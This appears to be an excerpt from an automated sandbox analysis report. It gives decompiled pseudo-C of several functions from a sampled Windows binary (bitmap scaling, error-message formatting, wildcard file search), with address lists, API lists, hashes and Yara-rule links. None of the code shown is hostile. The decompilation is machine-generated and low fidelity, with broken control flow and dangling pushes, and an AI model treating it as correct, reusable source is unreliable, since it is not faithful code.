					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0xcd33ac);
					_push(1);
					_push(0);
					_push(0xcd417c);
					if( *0xcddff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0xcd418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E00CBE920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0xcddedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00CB9954();
			}
























































                0x00cb975d
                0x00cb9767
                0x00cb9782
                0x00cb978e
                0x00cb9798
                0x00cb979f
                0x00cb97a3
                0x00cb97a4
                0x00cb97aa
                0x00cb97ac
                0x00cb97ac
                0x00cb97b3
                0x00cb97b5
                0x00cb97b6
                0x00cb97be
                0x00cb97bf
                0x00cb97c0
                0x00cb97cd
                0x00cb9948
                0x00000000
                0x00cb97d3
                0x00cb97d3
                0x00cb97e3
                0x00cb97e8
                0x00cb97ec
                0x00cb97f9
                0x00cb9803
                0x00cb9804
                0x00cb980a
                0x00cb981c
                0x00cb9820
                0x00cb9822
                0x00cb9823
                0x00cb9825
                0x00cb9826
                0x00cb9827
                0x00cb982a
                0x00cb982b
                0x00cb982c
                0x00cb9831
                0x00cb9835
                0x00cb983b
                0x00cb9851
                0x00cb9859
                0x00cb9863
                0x00cb9869
                0x00cb986d
                0x00cb9876
                0x00cb987b
                0x00cb987e
                0x00cb9895
                0x00cb989b
                0x00cb98a9
                0x00cb98ab
                0x00cb98b7
                0x00cb98ba
                0x00cb98cf
                0x00cb98d2
                0x00cb98d6
                0x00cb98da
                0x00cb98de
                0x00cb98e5
                0x00cb98e9
                0x00cb98ed
                0x00cb98f6
                0x00cb9901
                0x00cb9906
                0x00cb9907
                0x00cb990d
                0x00cb9914
                0x00cb990f
                0x00cb990f
                0x00cb990f
                0x00cb991a
                0x00cb9921
                0x00cb9921
                0x00cb9924
                0x00cb992b
                0x00cb992e
                0x00cb9935
                0x00cb9938
                0x00cb993f
                0x00cb9944
                0x00cb9946
                0x00cb9946
                0x00000000
                0x00cb9944
                0x00cb983d
                0x00cb9844
                0x00cb9844
                0x00cb980c
                0x00cb9813
                0x00cb9816
                0x00cb9816
                0x00cb97f1
                0x00000000
                0x00cb97f1
                0x00cb97cd
                0x00cb9769
                0x00cb976d
                0x00cb9771
                0x00000000

                APIs
                  • Part of subcall function 00CB960F: GetDC.USER32(00000000), ref: 00CB9613
                  • Part of subcall function 00CB960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB961E
                  • Part of subcall function 00CB960F: ReleaseDC.USER32(00000000,00000000), ref: 00CB9629
                • GetObjectW.GDI32(?,00000018,?,00000000,?,76B95B70), ref: 00CB978E
                  • Part of subcall function 00CB9954: GetDC.USER32(00000000), ref: 00CB995D
                  • Part of subcall function 00CB9954: GetObjectW.GDI32(?,00000018,?,?,?,76B95B70,?,?,?,?,?,00CB977A,?,?,?), ref: 00CB998C
                  • Part of subcall function 00CB9954: ReleaseDC.USER32(00000000,?), ref: 00CB9A20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: a1252e5b177ffb3f2413cd233fb8fb4f2a078a92f0d7e91ed2ed198a4460a7e9
                • Instruction ID: 16152a11d9966932313a1630abbad2a84f10bf78affb0dfafddf35d9f53e12c6
                • Opcode Fuzzy Hash: a1252e5b177ffb3f2413cd233fb8fb4f2a078a92f0d7e91ed2ed198a4460a7e9
                • Instruction Fuzzy Hash: 12611671608201AFD214CF65C888EABBBE8FF89704F10491DF69AC7260DB71E905CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB0A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                C-Code - Quality: 17%
                			E00CB0A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E00CBC339();
						_t28 = E00CADA42(_t41, 0x96);
						return E00CB9735( *0xce75d8, E00CADA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E00CADA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E00CBA57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00CB0D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00CADA42(__ecx, 0xc8) =  &_v516;
										__eax = E00CA3E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00CBA57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00CADA42(_t41);
							L7:
							_push(0);
							L8:
							return E00CBA57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00CB0D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00CB9D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00CADA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00CADA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00CADA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













                0x00cb0a9f
                0x00cb0aa9
                0x00cb0aab
                0x00cb0aae
                0x00cb0ab1
                0x00cb0cd8
                0x00cb0cdb
                0x00cb0cdd
                0x00cb0ce9
                0x00000000
                0x00cb0d00
                0x00cb0ab7
                0x00cb0ab7
                0x00cb0cce
                0x00cb0bfb
                0x00cb0c00
                0x00cb0c01
                0x00cb0b3e
                0x00cb0b3e
                0x00cb0b07
                0x00000000
                0x00cb0b07
                0x00cb0abd
                0x00cb0ac0
                0x00cb0bc0
                0x00cb0bc3
                0x00cb0c83
                0x00cb0c83
                0x00cb0c86
                0x00cb0cc4
                0x00000000
                0x00cb0cc4
                0x00cb0c88
                0x00cb0c88
                0x00cb0c8b
                0x00cb0cbd
                0x00000000
                0x00cb0cbd
                0x00cb0c8d
                0x00cb0c8d
                0x00cb0c90
                0x00cb0cb0
                0x00cb0cb3
                0x00000000
                0x00cb0cb3
                0x00cb0c92
                0x00cb0c92
                0x00cb0c95
                0x00cb0ca6
                0x00000000
                0x00cb0ca6
                0x00cb0c97
                0x00cb0c97
                0x00cb0c9a
                0x00cb0c9c
                0x00000000
                0x00cb0c9c
                0x00cb0bc9
                0x00cb0bc9
                0x00cb0c7c
                0x00000000
                0x00cb0c7c
                0x00cb0bcf
                0x00cb0bd2
                0x00cb0bd5
                0x00cb0bdb
                0x00000000
                0x00cb0be2
                0x00000000
                0x00000000
                0x00cb0bec
                0x00000000
                0x00000000
                0x00cb0bf6
                0x00000000
                0x00000000
                0x00cb0c08
                0x00000000
                0x00000000
                0x00cb0c0c
                0x00000000
                0x00000000
                0x00cb0c10
                0x00cb0c13
                0x00000000
                0x00000000
                0x00cb0c1a
                0x00000000
                0x00000000
                0x00cb0c21
                0x00000000
                0x00000000
                0x00cb0c28
                0x00cb0c2b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cb0c35
                0x00cb0c38
                0x00000000
                0x00000000
                0x00cb0c4d
                0x00cb0c59
                0x00cb0c5e
                0x00cb0c61
                0x00cb0c67
                0x00000000
                0x00000000
                0x00cb0bdb
                0x00cb0bd5
                0x00cb0ac6
                0x00cb0ac6
                0x00cb0bb7
                0x00cb0bb9
                0x00cb0b5b
                0x00cb0b5b
                0x00cb0ae3
                0x00cb0ae3
                0x00cb0ae5
                0x00000000
                0x00cb0aea
                0x00cb0acf
                0x00cb0ad5
                0x00000000
                0x00cb0af2
                0x00cb0af4
                0x00cb0af9
                0x00000000
                0x00000000
                0x00cb0adc
                0x00cb0ade
                0x00000000
                0x00000000
                0x00cb0b00
                0x00cb0b02
                0x00000000
                0x00000000
                0x00cb0b0d
                0x00cb0b10
                0x00000000
                0x00000000
                0x00cb0b1c
                0x00cb0b1f
                0x00000000
                0x00000000
                0x00cb0b23
                0x00cb0b26
                0x00000000
                0x00000000
                0x00cb0b2a
                0x00cb0b2d
                0x00000000
                0x00000000
                0x00cb0b34
                0x00cb0b36
                0x00cb0b3b
                0x00cb0b3c
                0x00000000
                0x00000000
                0x00cb0b46
                0x00cb0b49
                0x00000000
                0x00000000
                0x00cb0b4d
                0x00cb0b50
                0x00000000
                0x00000000
                0x00cb0b54
                0x00cb0b56
                0x00000000
                0x00000000
                0x00cb0b63
                0x00cb0b65
                0x00000000
                0x00000000
                0x00cb0b6c
                0x00cb0b6f
                0x00000000
                0x00000000
                0x00cb0b76
                0x00cb0b79
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cb0b80
                0x00cb0b83
                0x00cb0b8b
                0x00000000
                0x00000000
                0x00cb0ba0
                0x00cb0ba3
                0x00000000
                0x00000000
                0x00cb0baa
                0x00cb0bad
                0x00cb0b12
                0x00cb0b17
                0x00cb0b18
                0x00000000
                0x00000000
                0x00cb0ad5
                0x00cb0acf
                0x00cb0ac0
                0x00cb0d09
                0x00cb0d09

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 00e25c2f93761441d79874314800e1029fb61e04fe9f204fe09a952700428651
                • Instruction ID: c3cbc821413b48c0fc1c2875cd9171be19214cade55b720afa44ea05d58e9aec
                • Opcode Fuzzy Hash: 00e25c2f93761441d79874314800e1029fb61e04fe9f204fe09a952700428651
                • Instruction Fuzzy Hash: C1511A352CC301FBEA211B958D42FF77A59AB05B04F70C906B7DB684E3D6A26D20B603
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00CC9E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00CC6F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00CCDD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00CC7DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00CC7B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E00CCDD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00CCA212(_a12, _t192, __eflags, _t212);
													E00CC7A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E00CCDD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00CC7DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0xcdd668; // 0x814d2927
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00CCDDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00CBE920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00CC5030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00CC9E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E00CBE203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00CC7A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00CCDD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00CCA1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00CC7ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00CC7DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}





















































































                0x00cc9e48
                0x00cc9e4b
                0x00cc9e51
                0x00cc9e69
                0x00cc9e6c
                0x00cc9e70
                0x00cc9e72
                0x00cc9e74
                0x00cc9e76
                0x00cc9e79
                0x00cc9e7c
                0x00cc9e7f
                0x00cc9e81
                0x00cc9ed9
                0x00cc9ed9
                0x00cc9edf
                0x00cc9ee1
                0x00cc9eec
                0x00cc9ef0
                0x00cc9ef2
                0x00cc9ef5
                0x00cc9ef9
                0x00cc9ef9
                0x00cc9efb
                0x00cc9efd
                0x00cc9eff
                0x00cc9f01
                0x00cc9f01
                0x00cc9f03
                0x00cc9f06
                0x00cc9f09
                0x00cc9f09
                0x00cc9f0b
                0x00cc9f0c
                0x00cc9f0c
                0x00cc9f17
                0x00cc9f19
                0x00cc9f1c
                0x00cc9f1d
                0x00cc9f20
                0x00cc9f20
                0x00cc9f24
                0x00cc9f27
                0x00cc9f2a
                0x00cc9f2a
                0x00cc9f38
                0x00cc9f3a
                0x00cc9f3d
                0x00cc9f3f
                0x00cc9f49
                0x00cc9f4c
                0x00cc9f4f
                0x00cc9f51
                0x00cc9f54
                0x00cc9f56
                0x00cc9fa6
                0x00cc9fa9
                0x00cc9fa9
                0x00cc9fab
                0x00000000
                0x00cc9f58
                0x00cc9f5a
                0x00cc9f5a
                0x00cc9f5c
                0x00cc9f5f
                0x00cc9f5f
                0x00cc9f64
                0x00cc9f67
                0x00cc9f67
                0x00cc9f69
                0x00cc9f6a
                0x00cc9f6a
                0x00cc9f6e
                0x00cc9f71
                0x00cc9f71
                0x00cc9f74
                0x00cc9f77
                0x00cc9f84
                0x00cc9f89
                0x00cc9f8c
                0x00cc9f8e
                0x00cc9fc8
                0x00cc9fc9
                0x00cc9fca
                0x00cc9fcb
                0x00cc9fcc
                0x00cc9fcd
                0x00cc9fd2
                0x00cc9fd6
                0x00cc9fd8
                0x00cc9fd9
                0x00cc9fdc
                0x00cc9fdc
                0x00cc9fdf
                0x00cc9fdf
                0x00cc9fe1
                0x00cc9fe2
                0x00cc9fe2
                0x00cc9feb
                0x00cc9fec
                0x00cc9fef
                0x00cc9ff2
                0x00cc9ff5
                0x00cc9ff7
                0x00cc9ffe
                0x00cca000
                0x00cca003
                0x00cca00d
                0x00cca010
                0x00cca011
                0x00cca013
                0x00cca027
                0x00cca027
                0x00cca02a
                0x00cca034
                0x00cca039
                0x00cca03c
                0x00cca03e
                0x00000000
                0x00cca040
                0x00cca044
                0x00cca04d
                0x00cca053
                0x00000000
                0x00cca056
                0x00cca015
                0x00cca015
                0x00cca01b
                0x00cca020
                0x00cca023
                0x00cca025
                0x00cca05c
                0x00cca05e
                0x00cca05f
                0x00cca060
                0x00cca061
                0x00cca062
                0x00cca063
                0x00cca068
                0x00cca06b
                0x00cca06c
                0x00cca06e
                0x00cca074
                0x00cca07b
                0x00cca07e
                0x00cca081
                0x00cca082
                0x00cca085
